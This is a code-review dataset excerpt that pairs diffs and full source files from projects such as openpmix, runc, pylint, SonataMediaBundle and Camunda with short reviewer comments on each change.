pmix_bfrop.copy_payload(reply, &(pmix_server_globals.gdata));
PMIX_SERVER_QUEUE_REPLY(peer, tag, reply);
return PMIX_SUCCESS;
}
if (PMIX_ABORT_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_abort(peer, buf, op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_COMMIT_CMD == cmd) {
rc = pmix_server_commit(peer, buf);
return rc;
}
if (PMIX_FENCENB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_fence(cd, buf, modex_cbfunc, op_cbfunc))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_GETNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_get(buf, get_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_FINALIZE_CMD == cmd) {
pmix_output_verbose(2, pmix_globals.debug_output,
"recvd FINALIZE");
/* call the local server, if supported */
if (NULL != pmix_host_server.client_finalized) {
PMIX_PEER_CADDY(cd, peer, tag);
(void)strncpy(proc.nspace, peer->info->nptr->nspace, PMIX_MAX_NSLEN);
proc.rank = peer->info->rank;
/* since the client is finalizing, remove them from any event
* registrations they may still have on our list */
PMIX_LIST_FOREACH(reginfo, &pmix_server_globals.events, pmix_regevents_info_t) {
PMIX_LIST_FOREACH(prev, ®info->peers, pmix_peer_events_info_t) {
if (prev->peer == peer) {
pmix_list_remove_item(®info->peers, &prev->super);
PMIX_RELEASE(prev);
break;
}
}
}
/* now tell the host server */
if (PMIX_SUCCESS != (rc = pmix_host_server.client_finalized(&proc, peer->info->server_object,
op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
}
/* turn off the recv event - we shouldn't hear anything
* more from this proc */
if (peer->recv_ev_active) {
event_del(&peer->recv_event);
peer->recv_ev_active = false;
}
return rc;
}
if (PMIX_PUBLISHNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_publish(peer, buf, op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_LOOKUPNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_lookup(peer, buf, lookup_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_UNPUBLISHNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_unpublish(peer, buf, op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_SPAWNNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_spawn(peer, buf, spawn_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_CONNECTNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_connect(cd, buf, false, cnct_cbfunc))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_DISCONNECTNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_connect(cd, buf, true, cnct_cbfunc))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_REGEVENTS_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_register_events(peer, buf, regevents_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_DEREGEVENTS_CMD == cmd) {
pmix_server_deregister_events(peer, buf);
return PMIX_SUCCESS;
}
if (PMIX_NOTIFY_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
rc = pmix_server_event_recvd_from_client(peer, buf, notifyerror_cbfunc, cd);
return rc;
}
if (PMIX_QUERY_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
rc = pmix_server_query(peer, buf, query_cbfunc, cd);
return rc;
}
if (PMIX_LOG_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
rc = pmix_server_log(peer, buf, op_cbfunc, cd);
return rc;
}
return PMIX_ERR_NOT_SUPPORTED;
}
static void server_message_handler(struct pmix_peer_t *pr, pmix_usock_hdr_t *hdr,
pmix_buffer_t *buf, void *cbdata)
{
pmix_peer_t *peer = (pmix_peer_t*)pr;
pmix_buffer_t *reply;
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"SWITCHYARD for %s:%d:%d",
peer->info->nptr->nspace,
peer->info->rank, peer->sd);
rc = server_switchyard(peer, hdr->tag, buf);
/* send the return, if there was an error returned */
if (PMIX_SUCCESS != rc) {
reply = PMIX_NEW(pmix_buffer_t);
pmix_bfrop.pack(reply, &rc, 1, PMIX_STATUS);
PMIX_SERVER_QUEUE_REPLY(peer, hdr->tag, reply);
}
}
static inline int _my_client(const char *nspace, pmix_rank_t rank)
{
pmix_peer_t *peer;
int i;
int local = 0;
for (i = 0; i < pmix_server_globals.clients.size; i++) {
if (NULL != (peer = (pmix_peer_t *)pmix_pointer_array_get_item(&pmix_server_globals.clients, i))) {
if (0 == strcmp(peer->info->nptr->nspace, nspace) && peer->info->rank == rank) {
local = 1;
break;
}
}
}
return local;
}
| 1 | 6,519 | This is going to create a problem - we are already encountering issues with the length of the usock pathname on recent Linux kernels as the temp directory base has moved down to the var directory under a name created by a hash. So adding another field to it is going to add to the problem. | openpmix-openpmix | c |
@@ -31,3 +31,13 @@ type ApplicationGetter interface {
type ApplicationCreator interface {
CreateApplication(app *Application) error
}
+
+const (
+ // AppCfnTemplateNameFormat is the base output file name when `app package`
+ // is called. This is also used to render the pipeline CFN template.
+ AppCfnTemplateNameFormat = "%s.stack.yml"
+ // AppCfnTemplateConfigurationNameFormat is the base output configuration
+ // file name when `app package` is called. It's also used to render the
+ // pipeline CFN template.
+ AppCfnTemplateConfigurationNameFormat = "%s-%s.params.json"
+) | 1 | // Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
package archer
// Application represents a deployable service or task.
type Application struct {
Project string `json:"project"` // Name of the project this application belongs to.
Name string `json:"name"` // Name of the application, which must be unique within a project.
Type string `json:"type"` // Type of the application (LoadBalanced app, etc)
}
// ApplicationStore can List, Create and Get applications in an underlying project management store
type ApplicationStore interface {
ApplicationLister
ApplicationGetter
ApplicationCreator
}
// ApplicationLister fetches and returns a list of application from an underlying project management store
type ApplicationLister interface {
ListApplications(projectName string) ([]*Application, error)
}
// ApplicationGetter fetches and returns an application from an underlying project management store
type ApplicationGetter interface {
GetApplication(projectName string, applicationName string) (*Application, error)
}
// ApplicationCreator creates an application in the underlying project management store
type ApplicationCreator interface {
CreateApplication(app *Application) error
}
| 1 | 10,984 | What do you think about moving this to the `cloudformation` pkg? | aws-copilot-cli | go |
@@ -63,6 +63,11 @@ abstract class BaseProvider implements MediaProviderInterface
*/
protected $name;
+ /**
+ * @var array
+ */
+ protected $clones = [];
+
/**
* @param string $name
* @param Filesystem $filesystem | 1 | <?php
declare(strict_types=1);
/*
* This file is part of the Sonata Project package.
*
* (c) Thomas Rabaix <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Sonata\MediaBundle\Provider;
use Gaufrette\Filesystem;
use Sonata\CoreBundle\Validator\ErrorElement;
use Sonata\MediaBundle\CDN\CDNInterface;
use Sonata\MediaBundle\Generator\GeneratorInterface;
use Sonata\MediaBundle\Model\MediaInterface;
use Sonata\MediaBundle\Resizer\ResizerInterface;
use Sonata\MediaBundle\Thumbnail\ThumbnailInterface;
abstract class BaseProvider implements MediaProviderInterface
{
/**
* @var array
*/
protected $formats = [];
/**
* @var string[]
*/
protected $templates = [];
/**
* @var ResizerInterface
*/
protected $resizer;
/**
* @var Filesystem
*/
protected $filesystem;
/**
* @var GeneratorInterface
*/
protected $pathGenerator;
/**
* @var CDNInterface
*/
protected $cdn;
/**
* @var ThumbnailInterface
*/
protected $thumbnail;
/**
* @var string
*/
protected $name;
/**
* @param string $name
* @param Filesystem $filesystem
* @param CDNInterface $cdn
* @param GeneratorInterface $pathGenerator
* @param ThumbnailInterface $thumbnail
*/
public function __construct($name, Filesystem $filesystem, CDNInterface $cdn, GeneratorInterface $pathGenerator, ThumbnailInterface $thumbnail)
{
$this->name = $name;
$this->filesystem = $filesystem;
$this->cdn = $cdn;
$this->pathGenerator = $pathGenerator;
$this->thumbnail = $thumbnail;
}
/**
* {@inheritdoc}
*/
final public function transform(MediaInterface $media): void
{
if (null === $media->getBinaryContent()) {
return;
}
$this->doTransform($media);
$this->flushCdn($media);
}
/**
* @param MediaInterface $media
*/
public function flushCdn(MediaInterface $media)
{
if ($media->getId() && $this->requireThumbnails() && !$media->getCdnIsFlushable()) {
$flushPaths = [];
foreach ($this->getFormats() as $format => $settings) {
if (MediaProviderInterface::FORMAT_ADMIN === $format ||
substr($format, 0, \strlen((string) $media->getContext())) === $media->getContext()) {
$flushPaths[] = $this->getFilesystem()->get($this->generatePrivateUrl($media, $format), true)->getKey();
}
}
if (!empty($flushPaths)) {
$cdnFlushIdentifier = $this->getCdn()->flushPaths($flushPaths);
$media->setCdnFlushIdentifier($cdnFlushIdentifier);
$media->setCdnIsFlushable(true);
$media->setCdnStatus(CDNInterface::STATUS_TO_FLUSH);
}
}
}
/**
* {@inheritdoc}
*/
public function addFormat($name, $format)
{
$this->formats[$name] = $format;
}
/**
* {@inheritdoc}
*/
public function getFormat($name)
{
return isset($this->formats[$name]) ? $this->formats[$name] : false;
}
/**
* {@inheritdoc}
*/
public function requireThumbnails()
{
return null !== $this->getResizer();
}
/**
* {@inheritdoc}
*/
public function generateThumbnails(MediaInterface $media)
{
$this->thumbnail->generate($this, $media);
}
/**
* {@inheritdoc}
*/
public function removeThumbnails(MediaInterface $media, $formats = null)
{
$this->thumbnail->delete($this, $media, $formats);
}
/**
* {@inheritdoc}
*/
public function getFormatName(MediaInterface $media, $format)
{
if (MediaProviderInterface::FORMAT_ADMIN === $format) {
return MediaProviderInterface::FORMAT_ADMIN;
}
if (MediaProviderInterface::FORMAT_REFERENCE === $format) {
return MediaProviderInterface::FORMAT_REFERENCE;
}
$baseName = $media->getContext().'_';
if (substr($format, 0, \strlen($baseName)) === $baseName) {
return $format;
}
return $baseName.$format;
}
/**
* {@inheritdoc}
*/
public function getProviderMetadata()
{
return new Metadata($this->getName(), $this->getName().'.description', null, 'SonataMediaBundle', ['class' => 'fa fa-file']);
}
/**
* {@inheritdoc}
*/
public function preRemove(MediaInterface $media)
{
if ($this->requireThumbnails()) {
$this->thumbnail->delete($this, $media);
}
}
/**
* {@inheritdoc}
*/
public function postRemove(MediaInterface $media)
{
$path = $this->getReferenceImage($media);
if ($this->getFilesystem()->has($path)) {
$this->getFilesystem()->delete($path);
}
}
/**
* {@inheritdoc}
*/
public function generatePath(MediaInterface $media)
{
return $this->pathGenerator->generatePath($media);
}
/**
* {@inheritdoc}
*/
public function getFormats()
{
return $this->formats;
}
/**
* {@inheritdoc}
*/
public function setName($name)
{
$this->name = $name;
}
/**
* {@inheritdoc}
*/
public function getName()
{
return $this->name;
}
/**
* {@inheritdoc}
*/
public function setTemplates(array $templates)
{
$this->templates = $templates;
}
/**
* {@inheritdoc}
*/
public function getTemplates()
{
return $this->templates;
}
/**
* {@inheritdoc}
*/
public function getTemplate($name)
{
return isset($this->templates[$name]) ? $this->templates[$name] : null;
}
/**
* {@inheritdoc}
*/
public function getResizer()
{
return $this->resizer;
}
/**
* {@inheritdoc}
*/
public function getFilesystem()
{
return $this->filesystem;
}
/**
* {@inheritdoc}
*/
public function getCdn()
{
return $this->cdn;
}
/**
* {@inheritdoc}
*/
public function getCdnPath($relativePath, $isFlushable)
{
return $this->getCdn()->getPath($relativePath, $isFlushable);
}
/**
* {@inheritdoc}
*/
public function setResizer(ResizerInterface $resizer)
{
$this->resizer = $resizer;
}
/**
* {@inheritdoc}
*/
public function prePersist(MediaInterface $media)
{
$media->setCreatedAt(new \DateTime());
$media->setUpdatedAt(new \DateTime());
}
/**
* {@inheritdoc}
*/
public function preUpdate(MediaInterface $media)
{
$media->setUpdatedAt(new \DateTime());
}
/**
* {@inheritdoc}
*/
public function validate(ErrorElement $errorElement, MediaInterface $media)
{
}
/**
* @param MediaInterface $media
*/
abstract protected function doTransform(MediaInterface $media);
}
| 1 | 10,631 | Please make this private by default | sonata-project-SonataMediaBundle | php |
@@ -16,6 +16,12 @@
*/
package org.camunda.bpm.engine.impl.util.xml;
+import org.camunda.bpm.engine.impl.ProcessEngineLogger;
+import org.camunda.bpm.engine.impl.cfg.ProcessEngineConfigurationImpl;
+import org.camunda.bpm.engine.impl.context.Context;
+import org.camunda.bpm.engine.impl.util.EngineUtilLogger;
+
+import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
| 1 | /*
* Copyright Camunda Services GmbH and/or licensed to Camunda Services GmbH
* under one or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information regarding copyright
* ownership. Camunda licenses this file to you under the Apache License,
* Version 2.0; you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.camunda.bpm.engine.impl.util.xml;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
/**
* @author Tom Baeyens
*/
public class Parser {
protected static SAXParserFactory defaultSaxParserFactory = SAXParserFactory.newInstance();
public static final Parser INSTANCE = new Parser();
public Parse createParse() {
return new Parse(this);
}
protected SAXParser getSaxParser() throws Exception {
return getSaxParserFactory().newSAXParser();
}
protected SAXParserFactory getSaxParserFactory() {
return defaultSaxParserFactory;
}
}
| 1 | 12,656 | We can add `@Override` annotations to all of the implementations of this method. I think this is a best practice for us, but it would be nicer in any case. | camunda-camunda-bpm-platform | java |
@@ -7,5 +7,11 @@ type Resolver interface {
// Detector allows detecting location by current ip
type Detector interface {
- DetectCountry() (string, error)
+ DetectLocation() (Location, error)
+}
+
+// Cache allows caching location
+type Cache interface {
+ Get() (Location, error)
+ RefreshAndGet() (Location, error)
} | 1 | package location
// Resolver allows resolving location by ip
type Resolver interface {
ResolveCountry(ip string) (string, error)
}
// Detector allows detecting location by current ip
type Detector interface {
DetectCountry() (string, error)
}
| 1 | 10,990 | Most of uses of `RefreshAndGet` seems to be made only for `Refresh` part, result is ignored. We can simplify this method to assigning single responsibility to it - just `Refresh()`. | mysteriumnetwork-node | go |
@@ -137,7 +137,10 @@ class OptionsManagerMixIn:
def add_optik_option(self, provider, optikcontainer, opt, optdict):
args, optdict = self.optik_option(provider, opt, optdict)
- option = optikcontainer.add_option(*args, **optdict)
+ try:
+ option = optikcontainer.add_option(*args, **optdict)
+ except optparse.OptionConflictError:
+ return
self._all_options[opt] = provider
self._maxlevel = max(self._maxlevel, option.level or 0)
| 1 | # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/main/LICENSE
import collections
import configparser
import contextlib
import copy
import functools
import optparse # pylint: disable=deprecated-module
import os
import sys
from pathlib import Path
from types import ModuleType
from typing import Dict, List, Optional, TextIO, Tuple, Union
import toml
from pylint import utils
from pylint.config.man_help_formatter import _ManHelpFormatter
from pylint.config.option import Option
from pylint.config.option_parser import OptionParser
def _expand_default(self, option):
"""Patch OptionParser.expand_default with custom behaviour
This will handle defaults to avoid overriding values in the
configuration file.
"""
if self.parser is None or not self.default_tag:
return option.help
optname = option._long_opts[0][2:]
try:
provider = self.parser.options_manager._all_options[optname]
except KeyError:
value = None
else:
optdict = provider.get_option_def(optname)
optname = provider.option_attrname(optname, optdict)
value = getattr(provider.config, optname, optdict)
value = utils._format_option_value(optdict, value)
if value is optparse.NO_DEFAULT or not value:
value = self.NO_DEFAULT_VALUE
return option.help.replace(self.default_tag, str(value))
@contextlib.contextmanager
def _patch_optparse():
# pylint: disable = redefined-variable-type
orig_default = optparse.HelpFormatter
try:
optparse.HelpFormatter.expand_default = _expand_default
yield
finally:
optparse.HelpFormatter.expand_default = orig_default
class OptionsManagerMixIn:
"""Handle configuration from both a configuration file and command line options"""
def __init__(self, usage, config_file=None):
self.config_file = config_file
self.reset_parsers(usage)
# list of registered options providers
self.options_providers = []
# dictionary associating option name to checker
self._all_options = collections.OrderedDict()
self._short_options = {}
self._nocallback_options = {}
self._mygroups = {}
# verbosity
self._maxlevel = 0
def reset_parsers(self, usage=""):
# configuration file parser
self.cfgfile_parser = configparser.ConfigParser(
inline_comment_prefixes=("#", ";")
)
# command line parser
self.cmdline_parser = OptionParser(Option, usage=usage)
self.cmdline_parser.options_manager = self
self._optik_option_attrs = set(self.cmdline_parser.option_class.ATTRS)
def register_options_provider(self, provider, own_group=True):
"""register an options provider"""
assert provider.priority <= 0, "provider's priority can't be >= 0"
for i, options_provider in enumerate(self.options_providers):
if provider.priority > options_provider.priority:
self.options_providers.insert(i, provider)
break
else:
self.options_providers.append(provider)
non_group_spec_options = [
option for option in provider.options if "group" not in option[1]
]
groups = getattr(provider, "option_groups", ())
if own_group and non_group_spec_options:
self.add_option_group(
provider.name.upper(),
provider.__doc__,
non_group_spec_options,
provider,
)
else:
for opt, optdict in non_group_spec_options:
self.add_optik_option(provider, self.cmdline_parser, opt, optdict)
for gname, gdoc in groups:
gname = gname.upper()
goptions = [
option
for option in provider.options
if option[1].get("group", "").upper() == gname
]
self.add_option_group(gname, gdoc, goptions, provider)
def add_option_group(self, group_name, _, options, provider):
# add option group to the command line parser
if group_name in self._mygroups:
group = self._mygroups[group_name]
else:
group = optparse.OptionGroup(
self.cmdline_parser, title=group_name.capitalize()
)
self.cmdline_parser.add_option_group(group)
group.level = provider.level
self._mygroups[group_name] = group
# add section to the config file
if (
group_name != "DEFAULT"
and group_name not in self.cfgfile_parser._sections
):
self.cfgfile_parser.add_section(group_name)
# add provider's specific options
for opt, optdict in options:
self.add_optik_option(provider, group, opt, optdict)
def add_optik_option(self, provider, optikcontainer, opt, optdict):
args, optdict = self.optik_option(provider, opt, optdict)
option = optikcontainer.add_option(*args, **optdict)
self._all_options[opt] = provider
self._maxlevel = max(self._maxlevel, option.level or 0)
def optik_option(self, provider, opt, optdict):
"""get our personal option definition and return a suitable form for
use with optik/optparse
"""
optdict = copy.copy(optdict)
if "action" in optdict:
self._nocallback_options[provider] = opt
else:
optdict["action"] = "callback"
optdict["callback"] = self.cb_set_provider_option
# default is handled here and *must not* be given to optik if you
# want the whole machinery to work
if "default" in optdict:
if (
"help" in optdict
and optdict.get("default") is not None
and optdict["action"] not in ("store_true", "store_false")
):
optdict["help"] += " [current: %default]"
del optdict["default"]
args = ["--" + str(opt)]
if "short" in optdict:
self._short_options[optdict["short"]] = opt
args.append("-" + optdict["short"])
del optdict["short"]
# cleanup option definition dict before giving it to optik
for key in list(optdict.keys()):
if key not in self._optik_option_attrs:
optdict.pop(key)
return args, optdict
def cb_set_provider_option(self, option, opt, value, parser):
"""optik callback for option setting"""
if opt.startswith("--"):
# remove -- on long option
opt = opt[2:]
else:
# short option, get its long equivalent
opt = self._short_options[opt[1:]]
# trick since we can't set action='store_true' on options
if value is None:
value = 1
self.global_set_option(opt, value)
def global_set_option(self, opt, value):
"""set option on the correct option provider"""
self._all_options[opt].set_option(opt, value)
def generate_config(
self, stream: Optional[TextIO] = None, skipsections: Tuple[str, ...] = ()
) -> None:
"""write a configuration file according to the current configuration
into the given stream or stdout
"""
options_by_section: Dict[str, List[Tuple]] = {}
sections = []
for provider in self.options_providers:
for section, options in provider.options_by_section():
if section is None:
section = provider.name
if section in skipsections:
continue
options = [
(n, d, v)
for (n, d, v) in options
if d.get("type") is not None and not d.get("deprecated")
]
if not options:
continue
if section not in sections:
sections.append(section)
alloptions = options_by_section.setdefault(section, [])
alloptions += options
stream = stream or sys.stdout
printed = False
for section in sections:
if printed:
print("\n", file=stream)
utils.format_section(
stream, section.upper(), sorted(options_by_section[section])
)
printed = True
def generate_manpage(
self, pkginfo: ModuleType, section: int = 1, stream: TextIO = sys.stdout
) -> None:
with _patch_optparse():
formatter = _ManHelpFormatter()
formatter.output_level = self._maxlevel
formatter.parser = self.cmdline_parser
print(
formatter.format_head(self.cmdline_parser, pkginfo, section),
file=stream,
)
print(self.cmdline_parser.format_option_help(formatter), file=stream)
print(formatter.format_tail(pkginfo), file=stream)
def load_provider_defaults(self):
"""initialize configuration using default values"""
for provider in self.options_providers:
provider.load_defaults()
def read_config_file(self, config_file=None, verbose=None):
"""Read the configuration file but do not load it (i.e. dispatching
values to each options provider)
"""
for help_level in range(1, self._maxlevel + 1):
opt = "-".join(["long"] * help_level) + "-help"
if opt in self._all_options:
break # already processed
help_function = functools.partial(self.helpfunc, level=help_level)
help_msg = f"{' '.join(['more'] * help_level)} verbose help."
optdict = {
"action": "callback",
"callback": help_function,
"help": help_msg,
}
provider = self.options_providers[0]
self.add_optik_option(provider, self.cmdline_parser, opt, optdict)
provider.options += ((opt, optdict),)
if config_file is None:
config_file = self.config_file
if config_file is not None:
config_file = os.path.expandvars(os.path.expanduser(config_file))
if not os.path.exists(config_file):
raise OSError(f"The config file {config_file} doesn't exist!")
use_config_file = config_file and os.path.exists(config_file)
if use_config_file:
self.set_current_module(config_file)
parser = self.cfgfile_parser
if config_file.endswith(".toml"):
self._parse_toml(config_file, parser)
else:
# Use this encoding in order to strip the BOM marker, if any.
with open(config_file, encoding="utf_8_sig") as fp:
parser.read_file(fp)
# normalize sections'title
for sect, values in list(parser._sections.items()):
if sect.startswith("pylint."):
sect = sect[len("pylint.") :]
if not sect.isupper() and values:
parser._sections[sect.upper()] = values
if not verbose:
return
if use_config_file:
msg = f"Using config file {os.path.abspath(config_file)}"
else:
msg = "No config file found, using default configuration"
print(msg, file=sys.stderr)
def _parse_toml(
self, config_file: Union[Path, str], parser: configparser.ConfigParser
) -> None:
"""Parse and handle errors of a toml configuration file."""
with open(config_file, encoding="utf-8") as fp:
content = toml.load(fp)
try:
sections_values = content["tool"]["pylint"]
except KeyError:
return
for section, values in sections_values.items():
section_name = section.upper()
# TOML has rich types, convert values to
# strings as ConfigParser expects.
if not isinstance(values, dict):
# This class is a mixin: add_message comes from the `PyLinter` class
self.add_message( # type: ignore
"bad-configuration-section", line=0, args=(section, values)
)
continue
for option, value in values.items():
if isinstance(value, bool):
values[option] = "yes" if value else "no"
elif isinstance(value, list):
values[option] = ",".join(value)
else:
values[option] = str(value)
for option, value in values.items():
try:
parser.set(section_name, option, value=value)
except configparser.NoSectionError:
parser.add_section(section_name)
parser.set(section_name, option, value=value)
def load_config_file(self):
"""Dispatch values previously read from a configuration file to each
options provider)"""
parser = self.cfgfile_parser
for section in parser.sections():
for option, value in parser.items(section):
try:
self.global_set_option(option, value)
except (KeyError, optparse.OptionError):
continue
def load_configuration(self, **kwargs):
"""override configuration according to given parameters"""
return self.load_configuration_from_config(kwargs)
def load_configuration_from_config(self, config):
for opt, opt_value in config.items():
opt = opt.replace("_", "-")
provider = self._all_options[opt]
provider.set_option(opt, opt_value)
def load_command_line_configuration(self, args=None) -> List[str]:
"""Override configuration according to command line parameters
return additional arguments
"""
with _patch_optparse():
args = sys.argv[1:] if args is None else list(args)
(options, args) = self.cmdline_parser.parse_args(args=args)
for provider in self._nocallback_options:
config = provider.config
for attr in config.__dict__.keys():
value = getattr(options, attr, None)
if value is None:
continue
setattr(config, attr, value)
return args
def add_help_section(self, title, description, level=0):
"""add a dummy option section for help purpose"""
group = optparse.OptionGroup(
self.cmdline_parser, title=title.capitalize(), description=description
)
group.level = level
self._maxlevel = max(self._maxlevel, level)
self.cmdline_parser.add_option_group(group)
def help(self, level=0):
"""return the usage string for available options"""
self.cmdline_parser.formatter.output_level = level
with _patch_optparse():
return self.cmdline_parser.format_help()
def helpfunc(self, option, opt, val, p, level): # pylint: disable=unused-argument
print(self.help(level))
sys.exit(0)
| 1 | 18,190 | @Pierre-Sassoulas Are we sure this doesn't create problems? Without it for some reason we get an error on `accept-no-param-docs` being a duplicate error. I couldn't figure out why it did this. This solves the issue and passes the tests, but I wonder if this creates other issues.. | PyCQA-pylint | py |
@@ -169,7 +169,17 @@ func (c *linuxContainer) OCIState() (*specs.State, error) {
}
func (c *linuxContainer) Processes() ([]int, error) {
- pids, err := c.cgroupManager.GetAllPids()
+ var pids []int
+ status, err := c.currentStatus()
+ if err != nil {
+ return pids, err
+ }
+ // for systemd cgroup, the unit's cgroup path will be auto removed if container's all processes exited
+ if status == Stopped && !c.cgroupManager.Exists() {
+ return pids, nil
+ }
+
+ pids, err = c.cgroupManager.GetAllPids()
if err != nil {
return nil, newSystemErrorWithCause(err, "getting all container pids from cgroups")
} | 1 | // +build linux
package libcontainer
import (
"bytes"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"net"
"os"
"os/exec"
"path/filepath"
"reflect"
"strings"
"sync"
"time"
securejoin "github.com/cyphar/filepath-securejoin"
"github.com/opencontainers/runc/libcontainer/cgroups"
"github.com/opencontainers/runc/libcontainer/configs"
"github.com/opencontainers/runc/libcontainer/intelrdt"
"github.com/opencontainers/runc/libcontainer/system"
"github.com/opencontainers/runc/libcontainer/utils"
"github.com/opencontainers/runtime-spec/specs-go"
"github.com/checkpoint-restore/go-criu/v4"
criurpc "github.com/checkpoint-restore/go-criu/v4/rpc"
"github.com/golang/protobuf/proto"
"github.com/sirupsen/logrus"
"github.com/vishvananda/netlink/nl"
"golang.org/x/sys/unix"
)
const stdioFdCount = 3
type linuxContainer struct {
id string
root string
config *configs.Config
cgroupManager cgroups.Manager
intelRdtManager intelrdt.Manager
initPath string
initArgs []string
initProcess parentProcess
initProcessStartTime uint64
criuPath string
newuidmapPath string
newgidmapPath string
m sync.Mutex
criuVersion int
state containerState
created time.Time
}
// State represents a running container's state
type State struct {
BaseState
// Platform specific fields below here
// Specified if the container was started under the rootless mode.
// Set to true if BaseState.Config.RootlessEUID && BaseState.Config.RootlessCgroups
Rootless bool `json:"rootless"`
// Paths to all the container's cgroups, as returned by (*cgroups.Manager).GetPaths
//
// For cgroup v1, a key is cgroup subsystem name, and the value is the path
// to the cgroup for this subsystem.
//
// For cgroup v2 unified hierarchy, a key is "", and the value is the unified path.
CgroupPaths map[string]string `json:"cgroup_paths"`
// NamespacePaths are filepaths to the container's namespaces. Key is the namespace type
// with the value as the path.
NamespacePaths map[configs.NamespaceType]string `json:"namespace_paths"`
// Container's standard descriptors (std{in,out,err}), needed for checkpoint and restore
ExternalDescriptors []string `json:"external_descriptors,omitempty"`
// Intel RDT "resource control" filesystem path
IntelRdtPath string `json:"intel_rdt_path"`
}
// Container is a libcontainer container object.
//
// Each container is thread-safe within the same process. Since a container can
// be destroyed by a separate process, any function may return that the container
// was not found.
type Container interface {
BaseContainer
// Methods below here are platform specific
// Checkpoint checkpoints the running container's state to disk using the criu(8) utility.
//
// errors:
// Systemerror - System error.
Checkpoint(criuOpts *CriuOpts) error
// Restore restores the checkpointed container to a running state using the criu(8) utility.
//
// errors:
// Systemerror - System error.
Restore(process *Process, criuOpts *CriuOpts) error
// If the Container state is RUNNING or CREATED, sets the Container state to PAUSING and pauses
// the execution of any user processes. Asynchronously, when the container finished being paused the
// state is changed to PAUSED.
// If the Container state is PAUSED, do nothing.
//
// errors:
// ContainerNotExists - Container no longer exists,
// ContainerNotRunning - Container not running or created,
// Systemerror - System error.
Pause() error
// If the Container state is PAUSED, resumes the execution of any user processes in the
// Container before setting the Container state to RUNNING.
// If the Container state is RUNNING, do nothing.
//
// errors:
// ContainerNotExists - Container no longer exists,
// ContainerNotPaused - Container is not paused,
// Systemerror - System error.
Resume() error
// NotifyOOM returns a read-only channel signaling when the container receives an OOM notification.
//
// errors:
// Systemerror - System error.
NotifyOOM() (<-chan struct{}, error)
// NotifyMemoryPressure returns a read-only channel signaling when the container reaches a given pressure level
//
// errors:
// Systemerror - System error.
NotifyMemoryPressure(level PressureLevel) (<-chan struct{}, error)
}
// ID returns the container's unique ID
func (c *linuxContainer) ID() string {
return c.id
}
// Config returns the container's configuration
func (c *linuxContainer) Config() configs.Config {
return *c.config
}
func (c *linuxContainer) Status() (Status, error) {
c.m.Lock()
defer c.m.Unlock()
return c.currentStatus()
}
func (c *linuxContainer) State() (*State, error) {
c.m.Lock()
defer c.m.Unlock()
return c.currentState()
}
func (c *linuxContainer) OCIState() (*specs.State, error) {
c.m.Lock()
defer c.m.Unlock()
return c.currentOCIState()
}
func (c *linuxContainer) Processes() ([]int, error) {
pids, err := c.cgroupManager.GetAllPids()
if err != nil {
return nil, newSystemErrorWithCause(err, "getting all container pids from cgroups")
}
return pids, nil
}
func (c *linuxContainer) Stats() (*Stats, error) {
var (
err error
stats = &Stats{}
)
if stats.CgroupStats, err = c.cgroupManager.GetStats(); err != nil {
return stats, newSystemErrorWithCause(err, "getting container stats from cgroups")
}
if c.intelRdtManager != nil {
if stats.IntelRdtStats, err = c.intelRdtManager.GetStats(); err != nil {
return stats, newSystemErrorWithCause(err, "getting container's Intel RDT stats")
}
}
for _, iface := range c.config.Networks {
switch iface.Type {
case "veth":
istats, err := getNetworkInterfaceStats(iface.HostInterfaceName)
if err != nil {
return stats, newSystemErrorWithCausef(err, "getting network stats for interface %q", iface.HostInterfaceName)
}
